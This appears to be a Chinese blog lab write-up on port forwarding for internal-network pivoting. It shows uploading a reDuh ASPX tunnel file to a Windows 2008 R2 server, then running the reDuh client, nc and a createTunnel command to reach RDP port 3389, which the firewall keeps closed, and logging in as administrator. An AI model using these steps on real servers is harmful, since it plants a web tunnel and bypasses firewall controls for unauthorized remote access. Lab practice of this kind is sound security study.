内网转发之反弹端口

反弹端口实验

实验环境:windows 2008r2服务器  和 本机

实验步骤

win2008服务器开启防火墙,开启3389端口并不对外开放,利用reduh工具使其服务器将其他端口公用。

本地计算机关闭防火墙和杀毒软件,安装java环境和jdk服务

实验流程:

配置虚拟机环境,将远程控制打开

内网转发之反弹端口_第1张图片

然后将reduh中的aspx文件上传到wwwroot下面

内网转发之反弹端口_第2张图片

然后本机计算机访问一下可以访问的到,出现错误不用管,是文件的内容出错,能连接就可以

内网转发之反弹端口_第3张图片

然后利用本地计算机的reduh工具连接2008的端口

代码要在文件所在路径下打开

java -jar reDuhClient.jar http://192.168.75.154/reduh.aspx

 

利用nc工具来连接1010端口

nc.exe -nvv 127.0.0.1 1010

再间接连接3389端口

[createTunnel]6666:127.0.0.1:3389

内网转发之反弹端口_第4张图片

连接成功,然后利用本机的远程连接连接虚拟机

内网转发之反弹端口_第5张图片

输入虚拟机的administrator账户可以连接,普通用户没有权限

内网转发之反弹端口_第6张图片

可以直接反弹端口连接3389端口。可以成功操作2008服务器。

实验就到这里了 ,有问题的可以留言。

你可能感兴趣的:(内网转发之反弹端口)